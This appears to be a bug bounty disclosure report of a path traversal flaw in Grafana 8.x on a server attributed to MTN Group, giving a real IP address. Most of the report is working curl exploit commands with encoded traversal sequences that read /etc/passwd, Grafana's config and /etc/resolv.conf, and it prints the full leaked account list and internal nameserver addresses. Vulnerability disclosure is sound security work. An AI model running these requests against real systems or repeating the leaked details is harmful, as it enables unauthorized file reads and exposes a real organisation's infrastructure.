path traversal vulnerability in Grafana 8.x allows " local file read "

Hi team, I've found a path traversal issue in the Grafana instances hosted on the MTN platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server. This IP " 41.242.91.22 " Domain Name " mtn.com.gn " is for MTN Group {F1545670} {F1545682} ##Steps To Reproduce: 1. Open url address : http://41.242.91.22:3000/login {F1545653} 2. File Read server for example /etc/passwd : Run the following command on the mac, linux terminal ```curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd``` Respons: ``` MacBook-Pro ~ % curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin libstoragemgmt:x:998:996:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin colord:x:997:995:User for colord:/var/lib/colord:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin qemu:x:107:107:qemu user:/:/sbin/nologin gluster:x:995:992:GlusterFS daemons:/run/gluster:/sbin/nologin chrony:x:994:991::/var/lib/chrony:/sbin/nologin unbound:x:993:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin geoclue:x:992:988:User for geoclue:/var/lib/geoclue:/sbin/nologin setroubleshoot:x:991:987::/var/lib/setroubleshoot:/sbin/nologin pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin saned:x:990:984:SANE scanner daemon user:/usr/share/sane:/sbin/nologin gnome-initial-setup:x:989:983::/run/gnome-initial-setup/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin infraop:x:1000:1000:infraop:/home/infraop:/bin/bash nginx:x:988:982:Nginx web server:/var/lib/nginx:/sbin/nologin armand_k:x:1001:1001::/home/armand_k:/bin/bash deploy:x:1002:1002::/home/deploy:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash memcached:x:987:980:Memcached daemon:/run/memcached:/sbin/nologin redis:x:986:979:Redis Database Server:/var/lib/redis:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin uwayo:x:1003:1003::/home/uwayo:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mugabo:x:1004:1004::/home/mugabo:/bin/bash nimble:x:985:978:user for Nimble Streamer:/etc/nimble:/sbin/nologin arnold:x:1005:1005::/home/arnold:/bin/bash as_ftp:x:1006:1006::/home/as_ftp:/bin/bash toure:x:1007:1007::/home/toure:/bin/bash mayur:x:1008:1008::/home/mayur:/bin/bash prometheus:x:1009:1009::/home/prometheus:/bin/false sd-agent:x:984:977:Server Density Agent User:/usr/bin/sd-agent/:/bin/bash node_exporter:x:983:976::/home/node_exporter:/bin/false grafana:x:982:975:grafana user:/usr/share/grafana:/sbin/nologin egales:x:1010:1010::/home/egales:/bin/bash ``` 3. File Read server /usr/share/grafana/conf/defaults.ini : Grafana config file ``` curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fshare%2Fgrafana%2Fconf%2Fdefaults.ini ``` {F1545689} 3. File Read server /etc/resolv.conf : ```curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fresolv.conf``` ``` MacBook-Pro ~ % curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fresolv.conf # Generated by NetworkManager nameserver 102.176.175.67 nameserver 102.176.175.93 ``` Tanke you ## Impact An unauthenticated user can get access to all system files if he knows the exact path of the file.